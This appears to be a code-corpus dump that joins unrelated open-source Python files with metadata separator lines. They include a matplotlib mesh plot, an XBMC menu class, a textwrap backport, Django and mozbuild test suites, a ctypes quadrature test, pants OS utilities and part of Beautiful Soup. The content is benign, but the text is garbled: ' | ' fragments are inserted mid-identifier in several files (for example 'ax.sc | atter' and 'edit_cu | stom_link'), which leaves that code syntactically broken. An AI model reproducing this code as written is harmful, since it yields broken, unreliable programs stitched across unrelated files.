surfy(.5*l4,.5*R,-.5*hpore,-.5*hpore+hmem,0.,size,5,5)
#front-left
surfy(-.5*l3,-.5*l2,-.5*hpore,.5*hpore-h2,0.,size,5,5)
surfy(-.5*l2,-.5*l1,-.5*hpore,.5*hpore-h1,0.,size,5,5)
surfy(-.5*l1,-.5*l0,-.5*hpore+hmem,.5*hpore,0.,size,5,5)
surfy(-.5*l4,-.5*R,-.5*hpore,-.5*hpore+hmem,0.,size,5,5)
#top-front
surfz(-.5*l0,.5*l0,.5*l1,.5*l0,.5*hpore,size,10,1)
surfz(-.5*l1,.5*l1,.5*l2,.5*l1,.5*hpore-h1,size,10,1)
surfz(-.5*l2,.5*l2,.5*l3,.5*l2,.5*hpore-h2,size,10,1)
surfz(-.5*R,.5*R,.5*l0,.5*R,-.5*hpore+hmem,size,5,5)
surfz(-.5*R,.5*R,.5*l0,.5*R,-.5*hpore,size,5,5)
#top-right
surfz(.5*l1,.5*l0,0.,.5*l1,.5*hpore,size,5,5)
surfz(.5*l2,.5*l1,0.,.5*l2,.5*hpore-h1,size,5,5)
surfz(.5*l3,.5*l2,0.,.5*l3,.5*hpore-h2,size,5,5)
surfz(.5*l0,.5*R,0.,.5*l0,-.5*hpore+hmem,size,5,5)
surfz(.5*l0,.5*R,0.,.5*l0,-.5*hpore,size,5,5)
#top-left
surfz(-.5*l1,-.5*l0,0.,.5*l1,.5*hpore,size,5,5)
surfz(-.5*l2,-.5*l1,0.,.5*l2,.5*hpore-h1,size,5,5)
surfz(-.5*l3,-.5*l2,0.,.5*l3,.5*hpore-h2,size,5,5)
surfz(-.5*l0,-.5*R,0.,.5*l0,-.5*hpore+hmem,size,5,5)
surfz(-.5*l0,-.5*R,0.,.5*l0,-.5*hpore,size,5,5)
#right
surfx(0.,.5*l1,.5*hpore-h1,.5*hpore,.5*l1,size,5,5)
surfx(0.,.5*l2,.5*hpore-h2,.5*hpore-h1,.5*l2,size,5,5)
surfx(0.,.5*l3,-.5*hpore,.5*hpore-h2,.5*l3,size,5,5)
surfx(0.,.5*l0,-.5*hpore+hmem,.5*hpore,.5*l0,size,5,5)
#left
surfx(0.,.5*l1,.5*hpore-h1,.5*h | pore,-.5*l1,size,5,5)
surfx(0.,.5*l2,.5*hpore-h2,.5*hpore-h1,-.5*l2,size,5,5)
surfx(0.,.5*l3,-.5*hpore,.5*hpore-h2,-.5*l3,size,5,5)
surfx(0.,.5*l0,-.5*hpore+hmem,.5*hpore,-.5*l0,size,5,5)
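# The points were generated in the wedge 0 <= y <= x of one quadrant (the
# other triangle was cut off above), so the eight mirrored/axis-swapped
# scatter calls below display the full 8-fold symmetric point cloud.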
ax.scatter(X,Y,Z)
ax.sc | atter(X,-Y,Z)
ax.scatter(-X,Y,Z)
ax.scatter(-X,-Y,Z)
ax.scatter(Y,X,Z)
ax.scatter(Y,-X,Z)
ax.scatter(-Y,X,Z)
ax.scatter(-Y,-X,Z)
plt.tight_layout()
plt.show()
plt.scatter(X_points,Y_points)
plt.plot([0.,1.,1.,0.,0.,1.],[0.,0.,1.,1.,0.,1.],color='blue')
ax=plt.gca()
ax.set_aspect(1)
plt.tight_layout()
plt.show()
|
xbmcmegapack/plugin.video.megapack.dev | resources/lib/menus/home_countries_saint_pierre_and_miquelon.py | Python | gpl-3.0 | 1,147 | 0.00262 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
| the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Genera | l Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Saint_pierre_and_miquelon():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Saint Pierre and Miquelon"])) |
riseml/config-parser | config_parser/sections/deploy.py | Python | mit | 198 | 0.005051 | from .job | s import JobSection
class DeploySection(JobSection):
schema_file = 'deploy.json'
def __init__(self, image, run, **kwargs):
super | (DeploySection, self).__init__(image, run) |
playingaround2017/test123 | gamera/backport/textwrap.py | Python | gpl-2.0 | 13,844 | 0.000939 | """Text wrapping and filling.
"""
# Copyright (C) 1999-2001 Gregory P. Ward.
# Copyright (C) 2002, 2003 Python Software Foundation.
# Written by Greg Ward <gward@python.net>
__revision__ = "$Id$"
import string, re
# Do the right thing with boolean values for all known Python versions
# (so this module can be copied to projects that don't depend on Python
# 2.3, e.g. Optik and Docutils).
try:
True, False
except NameError:
(True, False) = (1, 0)
__all__ = ['TextWrapper', 'wrap', 'fill']
# Hardcode the recognized whitespace characters to the US-ASCII
# whitespace characters. The main reason for doing this is that in
# ISO-8859-1, 0xa0 is non-breaking whitespace, so in certain locales
# that character winds up in string.whitespace. Respecting
# string.whitespace in those cases would 1) make textwrap treat 0xa0 the
# same as any other whitespace char, which is clearly wrong (it's a
# *non-breaking* space), 2) possibly cause problems with Unicode,
# since 0xa0 is not in range(128).
_whitespace = '\t\n\x0b\x0c\r '
class TextWrapper:
"""
Object for wrapping/filling text. The public interface consists of
the wrap() and fill() methods; the other methods are just there for
subclasses to override in order to tweak the default behaviour.
If you want to completely replace the main wrapping algorithm,
you'll probably have to override _wrap_chunks().
Several instance attributes control various aspects of wrapping:
width (default: 70)
the maximum width of wrapped lines (unless break_long_words
is false)
initial_indent (default: "")
string that will be prepended to the first line of wrapped
output. Counts towards the line's width.
subsequent_indent (default: "")
string that will be prepended to all lines save the first
of wrapped output; also counts towards each line's width.
expand_tabs (default: true)
Expand tabs in input text to spaces before further processing.
Each tab will become 1 .. 8 spaces, depending on its position in
its line. If false, each tab is treated as a single character.
replace_whitespace (default: true)
Replace all whitespace characters in the input text by spaces
after tab expansion. Note that if expand_tabs is false and
replace_whitespace is true, every tab will be converted to a
single space!
fix_sentence_endings (default: false)
Ensure that sentence-ending punctuation is always followed
by two spaces. Off by default because the algorithm is
(unavoidably) imperfect.
break_long_words (default: true)
Break words longer than 'width'. If false, those words will not
be broken, and some lines might be longer than 'width'.
"""
whitespace_trans = string.maketrans(_whitespace, ' ' * len(_whitespace))
unicode_whitespace_trans = {}
uspace = ord(u' ')
for x in map(ord, _whitespace):
unicode_whitespace_trans[x] = uspace
# This funky little regex is just the trick for splitting
# text up into word-wrappable chunks. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
# Hello/ /there/ /--/ /you/ /goof-/ball,/ /use/ /the/ /-b/ /option!
# (after stripping out empty strings).
wordsep_re = re.compile(r'(\s+|' # any whitespace
r'-*\w{2,}-(?=\w{2,})|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))') # em-dash
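    # A quick illustration of the comment above: the separators are capturing
    # groups, so re.split() keeps them, e.g. wordsep_re.split() turns
    # "use the -b option!" into ['use', ' ', 'the', ' ', '-b', ' ', 'option!']
    # once empty strings are filtered out (see _split() below).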
# XXX will there be a locale-or-charset-aware version of
# string.lowercase in 2.3?
sentence_end_re = re.compile(r'[%s]' # lowercase letter
r'[\.\!\?]' # sentence-ending punct.
r'[\"\']?' # optional end-of-quote
% string.lowercase)
def __init__ (self,
width=70,
initial_indent="",
subsequent_indent="",
expand_tabs=True,
replace_whitespace=True,
fix_sentence_endings=False,
break_long_words=True):
self.width = width
self.initial_indent = initial_indent
self.subsequent_indent = subsequent_indent
self.expand_tabs = expand_tabs
self.replace_whitespace = replace_whitespace
self.fix_sentence_endings = fix_sentence_endings
self.break_long_words = break_long_words
# -- Private methods -----------------------------------------------
# (possibly useful for subclasses to override)
def _munge_whitespace(self, text):
"""_munge_whitespace(text : string) -> string
Munge whitespace in text: expand tabs and convert all other
whitespace characters to spaces. Eg. " foo\tbar\n\nbaz"
becomes " foo bar baz".
"""
if self.expand_tabs:
text = text.expandtabs()
if self.replace_whitespace:
if isinstance(text, str):
text = text.translate(self.whitespace_trans)
elif isinstance(text, unicode):
text = text.translate(self.unicode_whitespace_trans)
return text
def _split(self, text):
"""_split(text : string) -> [string]
Split the text to wrap into indivisible chunks. Chunks are
not quite the same as words; see wrap_chunks() for full
details. As an example, the text
Look, goof-ball -- use the -b option!
breaks into the following chunks:
'Look,', ' ', 'goof-', 'ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', 'option!'
"""
chunks = self.wordsep_re.split(text)
chunks = filter(None, chunks)
return chunks
def _fix_sentence_endings(self, chunks):
"""_fix_sentence_endings(chunks : | [strin | g])
Correct for sentence endings buried in 'chunks'. Eg. when the
original text contains "... foo.\nBar ...", munge_whitespace()
and split() will convert that to [..., "foo.", " ", "Bar", ...]
which has one too few spaces; this method simply changes the one
space to two.
"""
i = 0
pat = self.sentence_end_re
while i < len(chunks)-1:
if chunks[i+1] == " " and pat.search(chunks[i]):
                chunks[i+1] = "  "
i += 2
else:
i += 1
def _handle_long_word(self, chunks, cur_line, cur_len, width):
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Handle a chunk of text (most likely a word, not whitespace) that
is too long to fit in any line.
"""
space_left = max(width - cur_len, 1)
# If we're allowed to break long words, then do so: put as much
# of the next chunk onto the current line as will fit.
if self.break_long_words:
cur_line.append(chunks[0][0:space_left])
chunks[0] = chunks[0][space_left:]
# Otherwise, we have to preserve the long word intact. Only add
# it to the current line if there's nothing already there --
# that minimizes how much we violate the width constraint.
elif not cur_line:
cur_line.append(chunks.pop(0))
# If we're not allowed to break long words, and there's already
# text on the current line, do nothing. Next time through the
# main loop of _wrap_chunks(), we'll wind up here again, but
# cur_len will be zero, so the next line will be entirely
# devoted to the long word that we can't handle right now.
def _wrap_chunks(self, chunks):
"""_wrap_chunks(chunks : [string]) -> [string]
Wrap a sequence of text chunks and return a list of lines of
length 'self.width' or less. (If 'break_long_words' is false,
some lines may be longer than this.) Chunks correspond roughly
        to words and the whitespace between them: each chunk is
        indivisible, but a line break can come between any two chunks.
        """
uw-it-aca/myuw | myuw/test/dao/test_quicklinks.py | Python | apache-2.0 | 8,048 | 0 | # Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TransactionTestCase
from myuw.models import VisitedLinkNew, CustomLink, PopularLink, User
from myuw.test import get_request_with_user
from myuw.dao.user import get_user_model
from myuw.dao.affiliation import get_all_affiliations
from myuw.dao.quicklinks import get_quicklink_data, get_link_label,\
add_custom_link, delete_custom_link, edit_custom_link,\
add_hidden_link, delete_hidden_link, get_popular_link_by_id,\
get_recent_link_by_id
class TestQuickLinkDAO(TransactionTestCase):
def test_recent_filtering(self):
def _get_recent(data):
recent = set()
for link in data['recent_links']:
recent.add(link['url'])
return recent
username = 'none'
req = get_request_with_user(username)
user = get_user_model(req)
u1 = 'http://example.com?q=1'
u2 = 'http://example.com?q=2'
v1 = VisitedLinkNew.objects.create(user=user, url=u1)
self.assertTrue(get_recent_link_by_id(req, v1.pk))
v2 = VisitedLinkNew.objects.create(user=user, url=u2)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 2)
self.assertTrue(u1 in recent)
self.assertTrue(u2 in recent)
plink = PopularLink.objects.create(url=u2)
self.assertTrue(get_popular_link_by_id(plink.pk))
self.assertIsNotNone(plink.json_data())
self.assertIsNotNone(str(plink))
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 1)
self.assertTrue(u1 in recent)
CustomLink.objects.create(user=user, url=u1)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 0)
for i in range(10):
VisitedLinkNew.objects.create(user=user,
url="http://example.com?q=%s" % i)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 5)
def test_link_label_override(self):
req = get_request_with_user('none')
user = get_user_model(req)
data = {"user": user,
"url": "http://example.com?q=replaceit",
"label": "Original"}
l1 = VisitedLinkNew.objects.create(**data)
self.assertEquals(get_link_label(l1), "Row For Unit Tests")
l1 = VisitedLinkNew.objects.create(user=user,
url="http://example.com?q=whatever",
label="Original")
self.assertEquals(get_link_label(l1), "Original")
def test_hidden_link(self):
req = get_request_with_user('none')
url = "http://s.ss.edu"
link = add_hidden_link(req, url)
self.assertEquals(link.url, url)
# second time
link1 = add_hidden_link(req, url)
self.assertEquals(link.pk, link1.pk)
self.assertIsNotNone(delete_hidden_link(req, link.pk))
# second time
self.assertIsNone(delete_hidden_link(req, link.pk))
def test_add_custom_link(self):
username = 'none'
req = get_request_with_user(username)
link = add_custom_link(req, "http://s1.ss.edu")
self.assertIsNone(link.label)
url = "http://s.ss.edu"
link_label = "ss"
link1 = add_custom_link(req, url, link_label)
self.assertEquals(link1.url, url)
self.assertEquals(link1.label, link_label)
# second time
link2 = add_custom_link(req, url, link_label)
self.assertEquals(link2.pk, link1.pk)
def test_delete_custom_link(self):
username = 'none'
req = get_request_with_user(username)
url = "http://s.ss.edu"
link = add_custom_link(req, url)
self.assertIsNotNone(delete_custom_link(req, link.pk))
# second time
self.assertIsNone(delete_custom_link(req, link.pk))
def test_edit_custom_link(self):
username = 'none'
req = get_request_with_user(username)
url = "http://s.ss.edu"
link = add_custom_link(req, url)
url1 = "http://s1.ss.edu"
link1 = edit_custom_link(req, link.pk, url1)
self.assertEquals(link1.url, url1)
url2 = "http://s2.ss.edu"
label2 = "s2"
link2 = edit_cu | stom_link(req, link1.pk, url2, label2)
self.assertIsNotNone(link2)
self.assertEquals(link2.label, label2)
def test_get_quicklink_data(self):
dat | a = {
"affiliation": "student",
"url": "http://iss1.washington.edu/",
"label": "ISS1",
"campus": "seattle",
"pce": False,
"affiliation": "{intl_stud: True}",
}
plink = PopularLink.objects.create(**data)
username = "jinter"
req = get_request_with_user(username)
affiliations = get_all_affiliations(req)
user = get_user_model(req)
link_data = {
"user": user,
"url": "http://iss.washington.edu/",
"label": "ISS1",
"is_anonymous": False,
"is_student": affiliations.get('student', False),
"is_undegrad": affiliations.get('undergrad', False),
"is_grad_student": affiliations.get('grad', False),
"is_employee": affiliations.get('employee', False),
"is_faculty": affiliations.get('faculty', False),
"is_seattle": affiliations.get('seattle', False),
"is_tacoma": affiliations.get('tacoma', False),
"is_bothell": affiliations.get('bothell', False),
"is_pce": affiliations.get('pce', False),
"is_student_employee": affiliations.get('stud_employee',
False),
"is_intl_stud": affiliations.get('intl_stud', False)
}
l1 = VisitedLinkNew.objects.create(**link_data)
qls = get_quicklink_data(req)
self.assertEqual(qls['recent_links'][0]['label'], "ISS1")
self.assertEqual(qls['default_links'][0]['label'],
"International Student Services (ISS)")
def test_bot_quicklinks(self):
username = "botgrad"
req = get_request_with_user(username)
bot_qls = get_quicklink_data(req)
self.assertEqual(bot_qls['default_links'][0]['url'],
"http://www.uwb.edu/cie")
def test_tac_quicklinks(self):
username = "tacgrad"
req = get_request_with_user(username)
tac_qls = get_quicklink_data(req)
self.assertEqual(tac_qls['default_links'][0]['label'],
"International Student and Scholar Services (ISSS)")
def test_MUWM_4760(self):
req = get_request_with_user('bill')
data = get_quicklink_data(req)
self.assertTrue(data['instructor'])
self.assertTrue(data['sea_emp'])
self.assertFalse(data['student'])
req = get_request_with_user('javerage')
data = get_quicklink_data(req)
self.assertFalse(data['instructor'])
self.assertTrue(data['student'])
self.assertFalse(data['bot_student'])
self.assertFalse(data['tac_student'])
self.assertTrue(data['sea_student'])
self.assertTrue(data['sea_emp'])
self.assertFalse(data['bot_emp'])
self.assertFalse(data['tac_emp'])
req = get_request_with_user('jbothell')
data = get_quicklink_data(req)
self.assertTrue(data['student'])
self.assertTrue(data['bot_student'])
req = get_request_with_user('eight')
data = get_quicklink_data(req)
self.assertTrue(data['student'])
self.assertTrue(data['tac_student'])
self.assertTrue(data['instructor'])
self.assertTrue(data['sea_emp'])
|
escapewindow/signingscript | src/signingscript/vendored/mozbuild/mozbuild/test/configure/test_configure.py | Python | mpl-2.0 | 54,289 | 0.000368 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function, unicode_literals
from StringIO import StringIO
import os
import sys
import textwrap
import unittest
from mozunit import (
main,
MockedOpen,
)
from mozbuild.configure.options import (
InvalidOptionError,
NegativeOptionValue,
PositiveOptionValue,
)
from mozbuild.configure import (
ConfigureError,
ConfigureSandbox,
)
from mozbuild.util import exec_
import mozpack.path as mozpath
test_data_path = mozpath.abspath(mozpath.dirname(__file__))
test_data_path = mozpath.join(test_data_path, 'data')
class TestConfigure(unittest.TestCase):
def get_config(self, options=[], env={}, configure='moz.configure',
prog='/bin/configure'):
config = {}
out = StringIO()
sandbox = ConfigureSandbox(config, env, [prog] + options, out, out)
sandbox.run(mozpath.join(test_data_path, configure))
if '--help' in options:
return out.getvalue(), config
self.assertEquals('', out.getvalue())
return config
def moz_configure(self, source):
return MockedOpen({
os.path.join(test_data_path,
'moz.configure'): textwrap.dedent(source)
})
def test_defaults(self):
config = self.get_config()
self.maxDiff = None
self.assertEquals({
'CHOICES': NegativeOptionValue(),
'DEFAULTED': PositiveOptionValue(('not-simple',)),
'IS_GCC': NegativeOptionValue(),
'REMAINDER': (PositiveOptionValue(), NegativeOptionValue(),
NegativeOptionValue(), NegativeOptionValue()),
'SIMPLE': NegativeOptionValue(),
'VALUES': NegativeOptionValue(),
'VALUES2': NegativeOptionValue(),
'VALUES3': Negativ | eOptionValue(),
'WITH_ENV': NegativeOptionValue(),
}, config)
def test_help(self):
help, config = self.get_config(['--help'], prog='configure')
self.assertEquals({}, config)
self.maxDiff = None
self.assertEquals(
'Usage: configure [options]\n'
'\n'
'Options: [defaults in brackets after descriptions]\n'
' --help | print this message\n'
' --enable-simple Enable simple\n'
' --enable-with-env Enable with env\n'
' --enable-values Enable values\n'
' --without-thing Build without thing\n'
' --with-stuff Build with stuff\n'
' --option Option\n'
' --with-returned-default Returned default [not-simple]\n'
' --returned-choices Choices\n'
' --enable-imports-in-template\n'
' Imports in template\n'
' --enable-include Include\n'
' --with-imports Imports\n'
'\n'
'Environment variables:\n'
' CC C Compiler\n',
help
)
def test_unknown(self):
with self.assertRaises(InvalidOptionError):
self.get_config(['--unknown'])
def test_simple(self):
for config in (
self.get_config(),
self.get_config(['--disable-simple']),
# Last option wins.
self.get_config(['--enable-simple', '--disable-simple']),
):
self.assertNotIn('ENABLED_SIMPLE', config)
self.assertIn('SIMPLE', config)
self.assertEquals(NegativeOptionValue(), config['SIMPLE'])
for config in (
self.get_config(['--enable-simple']),
self.get_config(['--disable-simple', '--enable-simple']),
):
self.assertIn('ENABLED_SIMPLE', config)
self.assertIn('SIMPLE', config)
self.assertEquals(PositiveOptionValue(), config['SIMPLE'])
self.assertIs(config['SIMPLE'], config['ENABLED_SIMPLE'])
# --enable-simple doesn't take values.
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-simple=value'])
def test_with_env(self):
for config in (
self.get_config(),
self.get_config(['--disable-with-env']),
self.get_config(['--enable-with-env', '--disable-with-env']),
self.get_config(env={'MOZ_WITH_ENV': ''}),
# Options win over environment
self.get_config(['--disable-with-env'],
env={'MOZ_WITH_ENV': '1'}),
):
self.assertIn('WITH_ENV', config)
self.assertEquals(NegativeOptionValue(), config['WITH_ENV'])
for config in (
self.get_config(['--enable-with-env']),
self.get_config(['--disable-with-env', '--enable-with-env']),
self.get_config(env={'MOZ_WITH_ENV': '1'}),
self.get_config(['--enable-with-env'],
env={'MOZ_WITH_ENV': ''}),
):
self.assertIn('WITH_ENV', config)
self.assertEquals(PositiveOptionValue(), config['WITH_ENV'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-with-env=value'])
with self.assertRaises(InvalidOptionError):
self.get_config(env={'MOZ_WITH_ENV': 'value'})
def test_values(self, name='VALUES'):
for config in (
self.get_config(),
self.get_config(['--disable-values']),
self.get_config(['--enable-values', '--disable-values']),
):
self.assertIn(name, config)
self.assertEquals(NegativeOptionValue(), config[name])
for config in (
self.get_config(['--enable-values']),
self.get_config(['--disable-values', '--enable-values']),
):
self.assertIn(name, config)
self.assertEquals(PositiveOptionValue(), config[name])
config = self.get_config(['--enable-values=foo'])
self.assertIn(name, config)
self.assertEquals(PositiveOptionValue(('foo',)), config[name])
config = self.get_config(['--enable-values=foo,bar'])
self.assertIn(name, config)
self.assertTrue(config[name])
self.assertEquals(PositiveOptionValue(('foo', 'bar')), config[name])
def test_values2(self):
self.test_values('VALUES2')
def test_values3(self):
self.test_values('VALUES3')
def test_returned_default(self):
config = self.get_config(['--enable-simple'])
self.assertIn('DEFAULTED', config)
self.assertEquals(
PositiveOptionValue(('simple',)), config['DEFAULTED'])
config = self.get_config(['--disable-simple'])
self.assertIn('DEFAULTED', config)
self.assertEquals(
PositiveOptionValue(('not-simple',)), config['DEFAULTED'])
def test_returned_choices(self):
for val in ('a', 'b', 'c'):
config = self.get_config(
['--enable-values=alpha', '--returned-choices=%s' % val])
self.assertIn('CHOICES', config)
self.assertEquals(PositiveOptionValue((val,)), config['CHOICES'])
for val in ('0', '1', '2'):
config = self.get_config(
['--enable-values=numeric', '--returned-choices=%s' % val])
self.assertIn('CHOICES', config)
self.assertEquals(PositiveOptionValue((val,)), config['CHOICES'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-values=numeric',
'--returned-choices=a'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-values=alpha', '--returned-choices=0'])
def test_included(self):
config = self.get_config( |
gregvonkuster/icqsol | tests/testQuadratureCpp.py | Python | mit | 1,770 | 0.007345 | from __future__ import print_function
from ctypes import cdll, POINTER, byref, c_void_p, c_double
import numpy
import pkg_resources
from icqsol.bem.icqQuadrature import triangleQuadrature
import glob
import sys
PY_MAJOR_VERSION = sys.version_info[0]
# On some distributions the fully qualified shared library name
# includes suffixes such as '.cpython-35m-darwin.so'
def getFullyQualifiedSharedLibraryName(libName):
return glob.glob(libName + '*')[0]
# Extract the shared library from the egg
if PY_MAJOR_VERSION < 3:
fullyQualifiedSharedLibraryName = pkg_resources.resource_filename('icqsol', 'icqLaplaceMatricesCpp.so')
else:
libName = pkg_resources.resource_filename('icqsol', 'icqLaplaceMatricesCpp')
fullyQualifiedSharedLibraryName = getFullyQualifiedSharedLibraryName(libName)
# Open the shared library
lib = cdll.LoadLibrary(fullyQualifiedSharedLibraryName)
# Opaque handle
handle = c_void_p(0)
# Constructor
lib.icqQuadratureInit(byref(handle))
# | Tests
def func(p):
pNorm = numpy.linalg.norm(p)
return 1.0/(-4*numpy.pi*pNorm)
maxOrder = lib.icqQuadratureGetMaxOrder(byref(handle))
pa = numpy.array([0., 0., 0.])
pb = numpy.array([1., 0., 0.])
pc = numpy.array([0., 1., 0.])
paPtr = pa.ctypes.data_as(POINTER(c_double))
pbPtr = pb.ctypes.data_as(POINTER(c_double))
pcPtr = pc.ctypes.data_as(POINTER(c_double))
lib.icqQuadratureEvaluate.restype = c_double
for order in range(1, maxOrder + 1):
integra | l = lib.icqQuadratureEvaluate(byref(handle), order, paPtr, pbPtr, pcPtr)
integral2 = triangleQuadrature(order=order, pa=pa, pb=pb, pc=pc, func=func)
print('order = ', order, ' integral = ', integral, ' integral2 = ', integral2)
assert(abs(integral - integral2) < 1.e-10)
# Destructor
lib.icqQuadratureDel(byref(handle))
|
clement-masson/IN104_simulateur | IN104_simulateur/boardState.py | Python | mit | 39 | 0 | f | rom .cpp.boardState import BoardState | |
benjyw/pants | src/python/pants/util/osutil.py | Python | apache-2.0 | 2,336 | 0.001712 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, V | ersion 2.0 (see LICENSE).
import errno
import logging
import os
import posix
from functools import reduce
from typing import Optional, Set
logger = logging.getLogger(__name__)
OS_ALIASES = {
"darwin": {"macos", "darwin", "macosx", "mac os x", "mac"},
"linux": {"linux", "linux2"},
}
Pid = int
def get_os_name(uname_result: Optional[posix.uname_result] = None) -> str:
"""
:API: public
"""
if uname_result is None:
uname | _result = os.uname()
return uname_result[0].lower()
def normalize_os_name(os_name: str) -> str:
"""
:API: public
"""
if os_name not in OS_ALIASES:
for proper_name, aliases in OS_ALIASES.items():
if os_name in aliases:
return proper_name
logger.warning(
"Unknown operating system name: {bad}, known names are: {known}".format(
bad=os_name, known=", ".join(sorted(known_os_names()))
)
)
return os_name
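# For example, normalize_os_name("macosx") -> "darwin" and
# normalize_os_name("linux2") -> "linux", per OS_ALIASES above.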
def get_normalized_os_name() -> str:
return normalize_os_name(get_os_name())
def known_os_names() -> Set[str]:
return reduce(set.union, OS_ALIASES.values())
# From kill(2) on OSX 10.13:
# [EINVAL] Sig is not a valid, supported signal number.
#
# [EPERM] The sending process is not the super-user and its effective user id does not match the effective user-id of the receiving process. When signaling a process group, this error is returned if
# any members of the group could not be signaled.
#
# [ESRCH] No process or process group can be found corresponding to that specified by pid.
#
# [ESRCH] The process id was given as 0, but the sending process does not have a process group.
def safe_kill(pid: Pid, signum: int) -> None:
"""Kill a process with the specified signal, catching nonfatal errors."""
assert isinstance(pid, Pid)
assert isinstance(signum, int)
try:
os.kill(pid, signum)
except (IOError, OSError) as e:
if e.errno in [errno.ESRCH, errno.EPERM]:
pass
elif e.errno == errno.EINVAL:
raise ValueError(f"Invalid signal number {signum}: {e}", e)
else:
raise
|
heldergg/dre | lib/bs4/__init__.py | Python | gpl-3.0 | 12,881 | 0.001009 | """Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.0.4"
__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson"
__license__ = "MIT"
__all__ = ['BeautifulSoup']
import re
import warnings
from .builder import builder_registry
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
ResultSet,
SoupStrainer,
Tag,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
syntax_error = u'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work. You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
"""
This class defines the basic interface called by the tree builders.
These methods will be called by the parser:
reset()
feed(markup)
The tree builder may call these methods from its feed() implementation:
handle_starttag(name, attrs) # See note about return value
handle_endtag(name)
handle_data(data) # Appends to the current data node
endData(containerClass=NavigableString) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
ROOT_TAG_NAME = u'[document]'
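    # A rough sketch (illustrative, following the docstring above) of the
    # events a builder would drive for markup like '<p>hi</p>':
    #   soup.reset()
    #   soup.handle_starttag('p', {})   # opens a Tag and pushes it
    #   soup.handle_data('hi')          # buffered until endData() flushes it
    #   soup.handle_endtag('p')         # closes and pops the Tag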
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = {9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, **kwargs):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser."""
if 'convertEntities' in kwargs:
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. You can pass in features='html' "
"or features='xml' to get a builder capable of handling "
"one or the other.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if len(kwargs) > 0:
arg = kwargs.keys().pop()
raise TypeError(
"__init__() got an unexpected keyword argument '%s'" % arg)
if builder is None:
